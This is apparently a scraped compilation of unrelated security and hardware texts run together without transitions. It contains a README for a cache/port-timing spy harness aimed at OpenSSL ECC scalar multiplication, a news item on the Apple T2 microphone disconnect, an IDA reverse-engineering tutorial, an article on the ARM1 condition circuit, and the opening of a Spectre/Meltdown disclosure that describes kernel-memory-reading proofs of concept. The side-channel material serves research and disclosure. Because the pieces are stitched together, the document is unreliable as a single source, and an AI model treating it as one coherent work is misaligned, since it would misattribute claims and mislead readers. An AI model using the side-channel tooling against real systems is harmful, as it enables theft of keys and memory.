Measurement process that outputs measurements in timings.bin. To change the spy strategy, check the port defines in spy.h. Only one strategy should be active at build time.

Note that timings.bin is actually raw clock cycle counter values, not latencies. Look in parse_raw_simple.py to understand the data format if necessary.

ecc

Victim harness for running OpenSSL scalar multiplication with known inputs. Example:

./ecc M 4 deadbeef0123456789abcdef00000000c0ff33

This will execute 4 consecutive calls to EC_POINT_mul with the given hex scalar.

parse_raw_simple.py

Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here.

You might have to adjust the CEIL variable if the plots are too aggressively clipped.

Python packages:

sudo apt-get install python-numpy python-matplotlib

Usage

Turn off frequency scaling:

./freq.sh

Make sure everything builds:

make clean
make

Take a measurement:

./sync.sh

View the trace:

python parse_raw_simple.py timings.bin

You can play around with one victim at a time in sync.sh. Sample output for the openssl dgst victim is in parse_raw_simple.png.

Credits

  • Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba)
  • Billy Bob Brumley (Tampere University of Technology, Tampere, Finland)
  • Sohaib ul Hassan (Tampere University of Technology, Tampere, Finland)
  • Cesar Pereida García (Tampere University of Technology, Tampere, Finland)
  • Nicola Tuveri (Tampere University of Technology, Tampere, Finland)

Apple T2 security chip on new MacBook prevents software from using the mic to eavesdrop

(Original text)

The new Apple MacBooks are equipped with a T2 security chip that uses a hardware-disconnect design and can automatically disable the microphone when necessary, such as when the laptop lid is closed. The Apple T2 security chip also bundles the Secure Enclave coprocessor, which is designed to support macOS's Apple File System (APFS) encrypted storage, Touch ID, secure boot and more.

In addition, the chip has a number of controllers that integrate management functions for the system, SSD, audio, and image signal processors. As described in the Apple T2 Chip Security Overview document published in October 2018:

“All Mac portables with the Apple T2 Security Chip feature a hardware disconnect that ensures that the microphone is disabled whenever the lid is closed.”

As a result, when the MacBook lid is closed, even attackers running with kernel or root privileges cannot eavesdrop on users through the microphone. The webcam, however, is not disconnected in hardware when the lid is closed. Apple said: “The camera is not disconnected in hardware because its field of view is completely obstructed with the lid closed.” This hardware-based protection makes it extremely difficult for malicious attackers to eavesdrop.

 

Reverse Engineering Advanced Programming Concepts

BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)

Preface

Throughout this article we will be breaking down the following programming concepts and analyzing the decompiled assembly versions of each instruction:

  1. Arrays
  2. Pointers
  3. Dynamic Memory Allocation
  4. Socket Programming (Network Programming)
  5. Threading

For the Part 1 of the BOLO: Reverse Engineering series, please click here.

Please note: While this article uses IDA Pro to disassemble the compiled code, many of the features of IDA Pro (i.e. graphing, pseudocode translation, etc.) can be found in plugins and builds for other free disassemblers such as radare2. Furthermore, while preparing for this article I took the liberty of changing some variable names in the disassembled code from IDA presets like “v20” to what they correspond to in the C code. This was done to make each portion easier to understand. Finally, please note that this C code was compiled into a 64-bit executable and disassembled with IDA Pro's 64-bit version. This can be especially seen when calculating array sizes, as the 32-bit registers (i.e. eax) are often doubled in size and transformed into 64-bit registers (i.e. rax).

Ok, Let’s begin!

While Part 1 broke down and described basic programming concepts like loops and IF statements, this article is meant to explain more advanced topics that you would have to decipher when reverse engineering.

Arrays

Let’s begin with Arrays, First, let’s take a look at the code as a whole:

Basic Arrays — Code

Now, let’s take a look at the decompiled assembly as a whole:

Basic Arrays — Decompiled assembly overview

As you can see, the 12 lines of code turned into quite a large block of code. But don’t be intimidated! Remember, all we’re doing here is setting up arrays!

Let’s break it down bit by bit:

Declaring an array with a literal — disassembled

When initializing an array with an integer literal, the compiler simply initializes the length through a local variable.

EDIT: The above photo labeled “Declaring an array with a literal — disassembled” is actually labeled incorrectly. While yes, when initializing an array with an integer literal the compiler does first initialize the length through a local variable, the above screenshot is actually the initialization of a stack canary. Stack Canaries are used to detect overflow attacks that may, if unmitigated, lead to execution of malicious code. During compilation the compiler allocated enough space for the only litArray element that would be used, litArray[0] (see photo below labeled “local variables — Arrays” — as you can see, the only litArray element that was allocated for is litArray[0]). Compiler optimization can significantly enhance the speed of applications.
Sorry for the confusion!

local variables — Arrays
Declaring an array with a variable — code
Declaring an array with a variable — assembly
declaring an array with pre-defined objects — code
declaring an array with pre-defined objects — assembly

When declaring an array with pre-defined index definitions, the compiler simply saves each pre-defined object into its own variable, which represents that index within the array (i.e. objArray4 = objArray[4]).

initializing an array index — code

 

initializing an array index — assembly

 

Much like declaring an array with pre-defined index definitions, when initializing (or setting) an index in an array, the compiler creates a new variable for said index.

retrieving an item from an array — code

 

retrieving an item from an array — assembly

 

When retrieving items from arrays, the item is taken from the index within the array and set to the desired variable.

creating a matrix with variables — code

Creating a matrix with variables — assembly

When creating a matrix, first the row and column sizes are set to their row and col variables. Next, the maximum and minimum indexes for the rows and columns are calculated and used to calculate the base location / overall size of the matrix in memory.

inputting to a matrix — code
inputting to a matrix — assembly

When inputting into a matrix, first the location of the desired index is calculated using the matrix's base location. Next, the contents of that index location are set to the desired input (i.e. 1337).
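
In C terms, the address arithmetic the compiler emits for a row-major matrix boils down to something like the following sketch (the helper and variable names are mine, not taken from the article's code):

#include <stddef.h>

// Row-major addressing: element (r, c) of a rows x cols matrix of ints
// lives at base + (r * cols + c) * sizeof(int).
int *element_address(int *base, size_t cols, size_t r, size_t c)
{
    return base + (r * cols + c);
}

// Writing 1337 into matrix[r][c] is therefore equivalent to:
//     *element_address(&matrix[0][0], cols, r, c) = 1337;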

Retrieving from a matrix — code
Retrieving from a matrix — assembly

When retrieving from a matrix, the same index calculation performed during the input sequence is carried out again, but instead of writing something into the index, the index's contents are read and stored in the desired variable (i.e. MatrixLeet).

Pointers

Now that we understand how arrays are used / look in assembly, let’s move on to pointers.

Pointers — Code
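
The snippet itself is only shown as an image; below is a minimal C reconstruction of what the pointer example most plausibly looks like, based on the steps described next (the names num and pointer follow the article, the rest is assumed):

#include <stdio.h>

int main(void)
{
    int num = 10;
    int *pointer = &num;              // pointer now holds the address of num

    printf("%d\n", num);              // value of num
    printf("%d\n", *pointer);         // value reached through the pointer
    printf("%p\n", (void *)&num);     // address of num
    printf("%p\n", (void *)pointer);  // same address, read from the pointer variable
    printf("%p\n", (void *)&pointer); // address of the pointer variable itself
    return 0;
}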

Let’s break the assembly down now:

int num = 10 in assembly

First, we set int num to 10.


pointer = &num

Next, we set the pointer variable to the address of the num variable (which holds 10).

printf num — assembly

We print out the num variable.

printf *pointer — assembly

We print out the pointer variable.

printf address of num — assembly

We print out the address of the num variable by using the lea (load effective address) opcode instead of mov.

printf address of num using pointer variable — assembly

We print the address of the num variable through the pointer variable.

printf address of pointer — assembly

We print the address of the pointer variable using the lea (load effective address) opcode instead of mov.

Dynamic Memory Allocation

The next item on our list is dynamic memory allocation. In this tutorial I will break down memory allocation using:

  1. malloc
  2. calloc
  3. realloc

malloc — dynamic memory allocation

First, let’s take a look at the code:

Dynamic memory allocation using malloc — code

 

In this function we allocate 11 characters using malloc and then copy “Hello World” into the allocated memory space.
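
The listing itself appears only as a screenshot; a hedged C sketch of such a function could look like this (the function name is mine, and I add one extra byte for the string terminator, whereas the disassembly below shows exactly 0x0B bytes being requested):

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void malloc_example(void)
{
    // Space for the 11 characters of "Hello World", plus the terminating NUL.
    char *mem_alloc = (char *)malloc(11 + 1);
    if (mem_alloc == NULL)
        return;

    strcpy(mem_alloc, "Hello World");
    printf("%s\n", mem_alloc);

    free(mem_alloc);
}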

Now, let’s take a look at the assembly:

Please note: Throughout the assembly you may see 'nop' instructions. These instructions were specifically placed by me during the preparation stage for this article so that I could easily navigate and comment throughout the assembly code.

dynamic memory allocation using malloc — assembly

When using malloc, the size of the allocation (0x0B) is first moved into the edi register. Next, the _malloc system function is called to allocate memory. The allocated memory area is then stored in the ptr variable. Next, the "Hello World" string is broken down into "Hello Wo" and "rld" as it is copied into the allocated memory space. Finally, the newly copied "Hello World" string is printed out and the allocated memory is freed using the _free system function.

calloc — dynamic memory allocation

First, let’s take a look at the code:

dynamic memory allocation using calloc — code

Much like in the malloc technique, space for 11 characters is allocated and then the “Hello World” string is copied into said space. Then, the newly relocated “Hello World” is printed out and the allocated memory space is freed.

dynamic memory allocation using calloc — assembly

Dynamic memory allocation through calloc looks nearly identical to dynamic memory allocation through malloc when broken down into assembly.

First, space for 11 characters (0x0B) is allocated using the _calloc system function. Then, the “Hello World” string is broken down into “Hello Wo” and “rld” as it is copied into the newly allocated memory area. Next, the newly relocated “Hello World” string is printed out and the allocated memory area is freed using the _free system function.

realloc — dynamic memory allocation

First, let’s look at the code:

dynamic memory allocation using realloc — code

In this function, space for 11 characters is allocated using malloc. Then, "Hello World" is copied into the newly allocated memory space before that memory is reallocated to fit 21 characters using realloc. Next, "1337 h4x0r @nonymoose" is copied into the newly reallocated space. Finally, after printing, the memory is freed.
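
Again, the original is only a screenshot; a plausible C sketch of the sequence just described (names and error handling are my own) is:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void realloc_example(void)
{
    char *mem_alloc = (char *)malloc(11 + 1);
    if (mem_alloc == NULL)
        return;

    strcpy(mem_alloc, "Hello World");
    printf("%s\n", mem_alloc);

    // Grow the buffer so it can hold the 21-character replacement string.
    char *bigger = (char *)realloc(mem_alloc, 21 + 1);
    if (bigger == NULL)
    {
        free(mem_alloc);
        return;
    }

    strcpy(bigger, "1337 h4x0r @nonymoose");
    printf("%s\n", bigger);

    free(bigger);
}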

Now, let’s take a look at the assembly:

Please note: Throughout the assembly you may see 'nop' instructions. These instructions were specifically placed by me during the preparation stage for this article so that I could easily navigate and comment throughout the assembly code.

dynamic memory allocation using realloc — assembly

First, memory is allocated using malloc precisely as it was in the above “malloc — dynamic memory allocation” section. Then, after printing out the newly relocated “Hello World” string, realloc (the _realloc system call) is called on the ptr variable (which represents the mem_alloc variable in the code) and a size of 0x15 (21 in decimal) is passed in as well. Next, “1337 h4x0r @nonymoose” is broken down into “1337 h4x”, “0r @nony”, “moos”, and “e” as it is copied into the newly re-allocated memory space. Finally, the space is freed using the _free system call.

Socket Programming

Next, we’ll cover socket programming by breaking down a very basic TCP client-server chat system.

Before we begin breaking down the server / client code, it is important to point out the following line of code at the top of the file:

define the Port number

This line defines the PORT variable as 1337. This variable will be used in both the client and the server as the network port used to create the connection.

Server

First, let’s look at the code:

Server — Code

First, the socket file descriptor ‘server’ is created with the AF_INET domain, the SOCK_STREAM type, and protocol code 0. Next, the socket options and the address are configured. Then, the socket is bound to the network address / port, and the server begins to listen on that socket with a maximum queue length of 3. Upon receiving a connection, the server accepts it into the sock variable and reads the transmitted value into the value variable. Finally, the server sends the serverhello string over the connection before the function returns.
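
Since the code is shown only as an image, here is a minimal sketch of a server that follows the same steps (AF_INET/SOCK_STREAM socket, setsockopt, bind, listen with a backlog of 3, accept, read, send); the message string and the omission of error handling are my own simplifications:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 1337

int server_example(void)
{
    char value[1024] = { 0 };
    const char *serverhello = "Hello from server";
    int opt = 1;

    int server = socket(AF_INET, SOCK_STREAM, 0);
    setsockopt(server, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));

    struct sockaddr_in address;
    address.sin_family = AF_INET;
    address.sin_addr.s_addr = INADDR_ANY;
    address.sin_port = htons(PORT);

    bind(server, (struct sockaddr *)&address, sizeof(address));
    listen(server, 3);                      // maximum queue length of 3

    socklen_t addrlen = sizeof(address);
    int sock = accept(server, (struct sockaddr *)&address, &addrlen);

    read(sock, value, sizeof(value));       // read the client's message
    printf("%s\n", value);

    send(sock, serverhello, strlen(serverhello), 0);

    close(sock);
    close(server);
    return 0;
}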

Now, let’s break it down into assembly:

initiating the server variables

First, the server variables are created and initialized.

server = socket(…) — assembly

Next, the socket file descriptor ‘server’ is created by calling the _socket system function with the protocol, type, and domain settings passed through the edx, esi, and edi registers respectively.

setsockopt(…) — assembly

Then, setsockopt is called to set the socket options on the ‘server’ socket file descriptor.

address initialization — assembly

Next, the server's address is initialized through address.sin_family, address.sin_addr.s_addr, and address.sin_port.

bind(…) — assembly

Upon address and socket configuration, the server is bound to the network address using the _bind system call.

listen(…) — assembly

Once bound, the server listens on the socket by passing in the ‘server’ socket file descriptor and a max queue length of 3.

sock = accept(…) — assembly

Once a connection is made, the server accepts the socket connection into the sock variable.

value = read(…) — assembly

The server then reads the transmitted message into the value variable using the _read system call.

send(…) — assembly

Finally, the server sends the serverhello message through the variable that represents serverhello in the code.

Client

First, let’s look at the code: 

Client — code

First, the socket file descriptor ‘sock’ is created with the AF_INET domain, SOCK_STREAM type, and protocol code 0. Next, memset is used to fill the memory area of server_addr with ‘0’s before the address information is set using server_addr.sin_family and server_addr.sin_port. Next, the address information is converted from text to binary format using inet_pton before the client connects to the server. Upon connection, the client sends its helloclient string and then reads the server's response into the value variable. Finally, the value variable is printed out and the function returns.
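
As with the server, here is a minimal sketch of a client that follows the same steps (socket, memset, address setup, inet_pton, connect, send, read); the message string is a placeholder of my own and error handling is omitted:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 1337

int client_example(void)
{
    char value[1024] = { 0 };
    const char *helloclient = "Hello from client";

    int sock = socket(AF_INET, SOCK_STREAM, 0);

    struct sockaddr_in server_addr;
    memset(&server_addr, '0', sizeof(server_addr));   // filled with '0' (0x30), as in the article
    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(PORT);

    // Convert the textual address to binary form; localhost is assumed.
    inet_pton(AF_INET, "127.0.0.1", &server_addr.sin_addr);

    connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr));

    send(sock, helloclient, strlen(helloclient), 0);
    read(sock, value, sizeof(value));
    printf("%s\n", value);

    close(sock);
    return 0;
}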

Now, let’s break down the assembly:

Client variable initialization — assembly

First, the client’s local variables are initialized.

sock = socket(…) — assembly

The ‘sock’ socket file descriptor is created by calling the _socket system function and passing in the protocol, type, and domain information through the edx, esi, and edi registers respectively.

memset(…) — assembly

Next, the server_address variable (represented as ‘s’ in assembly) is filled with ‘0’s (0x30) using the _memset system call.

Client — address configuration — assembly

Then, the address information for the server is configured.

inet_pton(…) — assembly

Next, the address is translated from text to binary format using the _inet_pton system call. Please note that since no address was explicitly defined in the code, localhost (127.0.0.1) is assumed.

connect(…) — assembly

The client connects to the server using the _connect system call.

send(…) — assembly

Upon connecting, the client sends the helloClient string to the server.

value = read(…)

Finally, the client reads the server’s reply into the value variable using the _read system call.

Threading

Finally, we’ll cover the basics of threading in C.

First, let’s look at the code:

Threading — Code

As you can see, the program first prints "This is before the thread", then creates a new thread that points to the *mythread function using the pthread_create function. Upon completion of the *mythread function (after sleeping for 1 second and printing "Hello from mythread"), the new thread is joined back to the main thread using the pthread_join function and "This is after the thread" is printed.
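
The listing is again a screenshot; a minimal C reconstruction of the described program (mythread follows the article, the rest is assumed):

#include <stdio.h>
#include <unistd.h>
#include <pthread.h>

void *mythread(void *arg)
{
    (void)arg;
    sleep(1);
    printf("Hello from mythread\n");
    return NULL;
}

int main(void)
{
    pthread_t tid;

    printf("This is before the thread\n");

    pthread_create(&tid, NULL, mythread, NULL);
    pthread_join(tid, NULL);            // wait for mythread to finish

    printf("This is after the thread\n");
    return 0;
}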

Now, let’s break down the assembly:

printf “This is before the thread” — assembly

First, the program prints “This is before the thread”.

Creating a new thread — assembly

Next, a new thread is created with the _pthread_create system call. This thread points to mythread as its start routine.

The mythread function — assembly

As you can see, the mythread function simply sleeps for one second before printing “Hello from mythread”.

Please note: In the mythread function you will see two ‘nop’s. These were specifically placed for easier navigation during the preparation stage of this article.

joining the mythread function’s thread back to the main thread — assembly

Upon returning from the mythread function, the new thread is joined with the main thread using the _pthread_join function.

printf “This is after the thread” — assembly

Finally, “This is after the thread” is printed out and the function returns.

Closing Statements

I hope this article was able to shed some light on some more advanced programming concepts and their underlying assembly code. Now that we’ve covered all the major programming concepts, the next few articles in the BOLO: Reverse Engineering series will be dedicated to different types of attacks and vulnerable code so that you may be able to more quickly identify vulnerabilities and attacks within closed source programs through static analysis.

Conditional instructions in the ARM1 processor, reverse engineered

By carefully examining the layout of the ARM1 processor, it can be reverse engineered. This article describes the interesting circuit used for conditional instructions: this circuit is marked in red on the die photo below. Unlike most processors, the ARM executes every instruction conditionally. Each instruction specifies a condition and is only executed if the condition is satisfied. For every instruction, the condition circuit reads the condition from the instruction register (blue), evaluates the condition flags (purple), and informs the control logic (yellow) if the instruction should be executed or skipped.

The ARM1 processor chip showing the condition evaluation circuit (red) and the main components it interacts with. Original photo courtesy of Computer History Museum.

Why care about the ARM1 chip? It is the highly influential ancestor of the extremely popular ARM processor. The ARM1 processor got off to a slow start in 1985, but ARM processors are now sold by the tens of billions; your smartphone probably runs on ARM. This article is part of my series on reverse engineering the ARM1; start with my first article for an overview of the chip.

What are conditional instructions?

A key part of any computer is the ability of a program to change what it is doing based on various conditions. Most computers provide conditional branch instructions, which cause execution to jump to a different part of the program based on various condition flags. For example, consider the code if (x == 0) { do_something }. Compiled to assembly code, this first tests the value of variable x and sets the Zero flag if x is 0. Next, a conditional branch instruction jumps over the do_something code if the Zero flag is not set.

The ARM processor takes conditionals much further than other processors: every instruction becomes a conditional instruction. Every instruction includes one of 16 conditions and the instruction is only executed if the condition is true; otherwise the instruction is skipped. (This is also known as predication.) The motivation is to avoid inefficient jumping around in the code.

The ARM manual excerpt below shows how four bits in each 32-bit instruction specify one of 16 conditions. Most of the conditions are straightforward, checking if values are equal, negative, higher, and so forth. Most instructions will use the "always" condition, which simply means the instruction always executes. The opposite "never" condition is not highly useful — an instruction with that condition never executes — but it can be used for a NOP, patching code, or adjusting timing of an instruction sequence.

Every instruction in the ARM processor has one of 16 conditions specified. The instruction is executed only if the condition is satisfied.

Studying the different conditions reveals much of how the condition circuit works. It is based on four condition flags. The zero (Z) flag is set if a value is zero. The negative (N) flag is set if a value is negative. The carry (C) flag is set if there is a carry or borrow from addition or subtraction. The overflow (V) flag is set if there is an overflow during signed arithmetic (details).

The top three bits of the instruction select one of eight conditions, as highlighted in yellow. The fourth bit selects the condition or its opposite (blue). If the fourth bit is 0, the condition must be true; if the fourth bit is 1, the condition must be false.
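
As a software model of what the circuit computes, the mapping from the 4-bit condition field and the N/Z/C/V flags to an execute/skip decision can be sketched in C (this models the behavior described in the manual, not the chip's actual netlist):

#include <stdbool.h>
#include <stdint.h>

// Evaluate a 4-bit ARM condition code against the N, Z, C and V flags.
// The top three bits select one of eight base conditions; the low bit
// (instruction bit 28) inverts the result.
bool condition_passes(uint8_t cond, bool n, bool z, bool c, bool v)
{
    bool base;
    switch ((cond >> 1) & 7) {
    case 0:  base = z;              break; // EQ / NE
    case 1:  base = c;              break; // CS / CC
    case 2:  base = n;              break; // MI / PL
    case 3:  base = v;              break; // VS / VC
    case 4:  base = c && !z;        break; // HI / LS
    case 5:  base = n == v;         break; // GE / LT
    case 6:  base = !z && (n == v); break; // GT / LE
    default: base = true;           break; // AL / NV
    }
    return (cond & 1) ? !base : base;
}

In the actual chip, the first column of gates produces the eight base conditions, the multiplexer performs the selection, and the gates driven by instruction bit 28 perform the inversion, as described in the sections below.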

Implementation of the circuit

The implementation of the conditional logic circuit matches the above description. First, the eight conditions are generated from the four flags. One of the conditions is selected based on the three instruction bits. If the fourth instruction bit is set, the condition is flipped. The result is 1 if the condition is satisfied, and 0 if the condition is not satisfied. One unexpected part of the circuit is that an undefined instruction or an interrupt causes the condition to be cleared, preventing execution of the instruction. The resulting condition signal output is connected to a control part of the chip, where it causes the instruction to be executed or not, as desired.

The condition code evaluation circuit from the ARM1 processor.

The diagram above shows the condition code circuit of the chip as it appears in the simulator; this is a zoomed-in version of the red rectangle indicated on the die earlier. The chip consists of multiple layers, indicated by different colors. Transistors appear as red or blue regions. NMOS transistors are red; they turn on with a 1 input and can pull their output low. PMOS transistors (blue) are complementary; they turn on with a 0 input and can pull their output high. Physically above the transistors is the polysilicon wiring layer (green). When polysilicon crosses a transistor it forms the gate (yellow) that controls the transistor. Finally, two layers of metal wiring (gray) are above the polysilicon.

The circuit is arranged in columns. The first column of transistors forms the logic gates to generate the conditions from the flag values. The next column is the multiplexer, a circuit that takes the eight input conditions and selects one. The rightmost column contains 8 NAND gates that decode the three instruction bits into 8 control lines. Each line is fed into the multiplexer to select the corresponding condition. At the right is the wiring for the 3 instruction bits and their complements. A few miscellaneous gates are at the bottom of the multiplexer and decoder columns. These include inverters to complement the instruction bits.

The condition generation gates

The diagram below zooms in on the left third of the circuit above. This part of the circuit uses standard CMOS logic gates to compute the conditions from the flags. Each gate is built from NMOS (red) and PMOS (blue) transistors in a horizontal strip. Comparing the text description of conditions from the manual with the logic shows how the conditions are generated. For instance, the HI (unsigned higher) condition requires flags "C set and Z clear". The top three gates generate this condition. The GE (greater than or equal) condition is more complex, requiring flags "N set and V set, or N clear and V clear". The next two gates compute this value. (Due to the way CMOS gates are constructed, an OR-NAND gate is constructed as a single gate.) Likewise, the other conditions are generated. The AL (always) condition is simply a 1, and doesn't require any circuitry. The conditions are fed into the multiplexer, which will be discussed below.

The output coming back from the multiplexer is the selected condition, labeled "cond" below. The NAND and OR-NAND gates flip the condition if instruction register bit 28 (ireg28) is set. This implements the eight opposite conditions. The result is labeled "ok", indicating the overall condition is satisfied. The final three gates block instruction execution for an interrupt or undefined instruction.

Gates in the ARM1 processor generate the various conditionals from the flag values.

One thing I'd like to emphasize about the ARM1 is that its layout is very orderly and non-optimized. While it may appear chaotic, the gates are arranged by combining relatively fixed blocks ("standard cells") and wiring them together. Each gate forms a strip and the gates are stacked together in columns. The polysilicon and metal layers connect the gates as necessary.

The layout of the ARM1 chip is a consequence of the VLSI Technology chip design software used to create it. The resulting layout is simple, but doesn’t use space very efficiently. Since the ARM1 uses very few transistors for its time, the designers weren’t worried about optimizing the layout. In contrast, earlier chips such as the Z-80 were hand-drawn, with each transistor and wire carefully shaped to use the minimum space possible. The diagram below shows a small part of the Z-80 processor layout, showing the extremely irregular but dense arrangement of the chip. The transistors are not arranged in rows as in the ARM1 above, but fit together to use all the available space.

A detail of the Z-80 processor layout, showing the complex hand-drawn layout. Each transistor and wire is carefully shaped to minimize the chip's size.

The multiplexer and decoders

Selecting the desired condition out of the eight possibilities is the job of a circuit called the multiplexer. The multiplexer takes 8 inputs (the conditions) and 8 control signals (based on the instruction) and selects the desired condition. To the right of the multiplexer, 8 NAND gates generate the 8 control signals by decoding the three instruction bits. Each gate simply looks at three bit values and outputs a 0 if the bits select that condition. For instance, if the first two bits are 0 and the third is 1, the gate for condition 1 outputs a 0, selecting that condition in the multiplexer. The animation below shows the circuit as the instruction bits cycle through the eight conditions. You can see the activated condition moving downwards through the circuit.


Animation of the multiplexer in the ARM1 condition code evaluation circuit.

While a multiplexer can be built from standard logic gates, the ARM1 multiplexer is built from a different type of circuitry called transmission gates (which the ARM1 also uses in its bit counter). A multiplexer built from transmission gates is more compact and faster than one built from standard logic (NAND gates). One feature of CMOS is that by combining an NMOS transistor and a PMOS transistor in parallel, a transmission gate switch can be built. Feeding 1 into the NMOS gate and 0 into the PMOS gate turns on both transistors and they pass their input through. With the opposite gate values, both transistors turn off and the switch opens. The multiplexer is built from 8 of these CMOS switches. Each condition input feeds into one switch, and the switch outputs are connected together. One switch is turned on at a time, selecting the corresponding input as the output value.

The diagram below shows the schematic of the multiplexer as well as its physical layout on the chip. Only the first three segments of the eight are shown; the remainder are similar. Each input is connected to two transistors forming a CMOS switch. Because the NMOS and PMOS gates require opposite signals, the multiplexer has an inverter for each control signal. Each inverter also consists of two transistors, but wired differently from the switch.


Schematic and diagram of the multiplexer inside the ARM1 processor’s condition code evaluation circuit.

Working together the decode circuit, inverters, and CMOS switches form the multiplexer that selects the desired condition from the eight choices. The logic described earlier allows this condition to be flipped, for a total of 16 possible conditions.
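Continuing the C sketch from above (again only a behavioral model, not the transmission-gate circuit): the decoder and multiplexer correspond to selecting one of the eight base conditions, and the flip controlled by instruction bit 28 is a single inversion, giving all 16 conditions.

#include <stdint.h>

/* Evaluate the 4-bit condition field of an ARM instruction (bits 31:28). */
static bool condition_holds(struct flags f, uint32_t insn) {
    unsigned cond = insn >> 28;
    bool ok = base_condition(f, cond >> 1);  /* the multiplexer selects one of 8 conditions */
    if (cond & 1)                            /* ireg28 flips it: EQ->NE, HI->LS, ..., AL->NV */
        ok = !ok;
    return ok;                               /* if false, the instruction is not executed */
}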

Conclusion

One unusual feature of the ARM instruction set is that every instruction has a condition associated with it and is only executed if the condition is true. The ARM1 chip is simple enough that the condition circuitry on the chip can be examined and understood at the transistor and gate level. Now that you’ve seen the internals of the condition logic, you can use the Visual ARM1 simulator to see the circuit in action. While the ARM1 may seem like a historical artifact of the 1980s, ARM processors power most smartphones, so there’s probably a similar circuit controlling your phone right now.

AMD ARM Reading privileged memory with a side-channel

We have discovered that CPU data cache timing can be abused to efficiently leak information out of mis-speculated execution, leading to (at worst) arbitrary virtual memory read vulnerabilities across local security boundaries in various contexts.

 

Variants of this issue are known to affect many modern processors, including certain processors by Intel, AMD and ARM. For a few Intel and AMD CPU models, we have exploits that work against real software. We reported this issue to Intel, AMD and ARM on 2017-06-01 [1].

 

So far, there are three known variants of the issue:

 

  • Variant 1: bounds check bypass (CVE-2017-5753)
  • Variant 2: branch target injection (CVE-2017-5715)
  • Variant 3: rogue data cache load (CVE-2017-5754)

 

Before the issues described here were publicly disclosed, Daniel Gruss, Moritz Lipp, Yuval Yarom, Paul Kocher, Daniel Genkin, Michael Schwarz, Mike Hamburg, Stefan Mangard, Thomas Prescher and Werner Haas also reported them; their [writeups/blogposts/paper drafts] are at:

  • Spectre (variants 1 and 2)
  • Meltdown (variant 3)
 

During the course of our research, we developed the following proofs of concept (PoCs):

 

  1. A PoC that demonstrates the basic principles behind variant 1 in userspace on the tested Intel Haswell Xeon CPU, the AMD FX CPU, the AMD PRO CPU and an ARM Cortex A57 [2]. This PoC only tests for the ability to read data inside mis-speculated execution within the same process, without crossing any privilege boundaries.
  2. A PoC for variant 1 that, when running with normal user privileges under a modern Linux kernel with a distro-standard config, can perform arbitrary reads in a 4GiB range [3] in kernel virtual memory on the Intel Haswell Xeon CPU. If the kernel’s BPF JIT is enabled (non-default configuration), it also works on the AMD PRO CPU. On the Intel Haswell Xeon CPU, kernel virtual memory can be read at a rate of around 2000 bytes per second after around 4 seconds of startup time. [4]
  3. A PoC for variant 2 that, when running with root privileges inside a KVM guest created using virt-manager on the Intel Haswell Xeon CPU, with a specific (now outdated) version of Debian’s distro kernel [5] running on the host, can read host kernel memory at a rate of around 1500 bytes/second, with room for optimization. Before the attack can be performed, some initialization has to be performed that takes roughly between 10 and 30 minutes for a machine with 64GiB of RAM; the needed time should scale roughly linearly with the amount of host RAM. (If 2MB hugepages are available to the guest, the initialization should be much faster, but that hasn’t been tested.)
  4. A PoC for variant 3 that, when running with normal user privileges, can read kernel memory on the Intel Haswell Xeon CPU under some precondition. We believe that this precondition is that the targeted kernel memory is present in the L1D cache.

 

For interesting resources around this topic, look down into the «Literature» section.

 

A warning regarding explanations about processor internals in this blogpost: This blogpost contains a lot of speculation about hardware internals based on observed behavior, which might not necessarily correspond to what processors are actually doing.

 

We have some ideas on possible mitigations and provided some of those ideas to the processor vendors; however, we believe that the processor vendors are in a much better position than we are to design and evaluate mitigations, and we expect them to be the source of authoritative guidance.

 

The PoC code and the writeups that we sent to the CPU vendors are available here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1272.

Tested Processors

  • Intel(R) Xeon(R) CPU E5-1650 v3 @ 3.50GHz (called «Intel Haswell Xeon CPU» in the rest of this document)
  • AMD FX(tm)-8320 Eight-Core Processor (called «AMD FX CPU» in the rest of this document)
  • AMD PRO A8-9600 R7, 10 COMPUTE CORES 4C+6G (called «AMD PRO CPU» in the rest of this document)
  • An ARM Cortex A57 core of a Google Nexus 5x phone [6] (called «ARM Cortex A57» in the rest of this document)

Glossary

retire: An instruction retires when its results, e.g. register writes and memory writes, are committed and made visible to the rest of the system. Instructions can be executed out of order, but must always retire in order.

 

logical processor core: A logical processor core is what the operating system sees as a processor core. With hyperthreading enabled, the number of logical cores is a multiple of the number of physical cores.

 

cached/uncached data: In this blogpost, «uncached» data is data that is only present in main memory, not in any of the cache levels of the CPU. Loading uncached data will typically take over 100 cycles of CPU time.

 

speculative execution: A processor can execute past a branch without knowing whether it will be taken or where its target is, therefore executing instructions before it is known whether they should be executed. If this speculation turns out to have been incorrect, the CPU can discard the resulting state without architectural effects and continue execution on the correct execution path. Instructions do not retire before it is known that they are on the correct execution path.

 

mis-speculation window: The time window during which the CPU speculatively executes the wrong code and has not yet detected that mis-speculation has occurred.

Variant 1: Bounds check bypass

This section explains the common theory behind all three variants and the theory behind our PoC for variant 1 that, when running in userspace under a Debian distro kernel, can perform arbitrary reads in a 4GiB region of kernel memory in at least the following configurations:

 

  • Intel Haswell Xeon CPU, eBPF JIT is off (default state)
  • Intel Haswell Xeon CPU, eBPF JIT is on (non-default state)
  • AMD PRO CPU, eBPF JIT is on (non-default state)

 

The state of the eBPF JIT can be toggled using the net.core.bpf_jit_enable sysctl.

Theoretical explanation

The Intel Optimization Reference Manual says the following regarding Sandy Bridge (and later microarchitectural revisions) in section 2.3.2.3 («Branch Prediction»):

 

Branch prediction predicts the branch target and enables the
processor to begin executing instructions long before the branch
true execution path is known.

 

In section 2.3.5.2 («L1 DCache»):

 

Loads can:
[…]
  • Be carried out speculatively, before preceding branches are resolved.
  • Take cache misses out of order and in an overlapped manner.

 

Intel’s Software Developer’s Manual [7] states in Volume 3A, section 11.7 («Implicit Caching (Pentium 4, Intel Xeon, and P6 family processors)»):

 

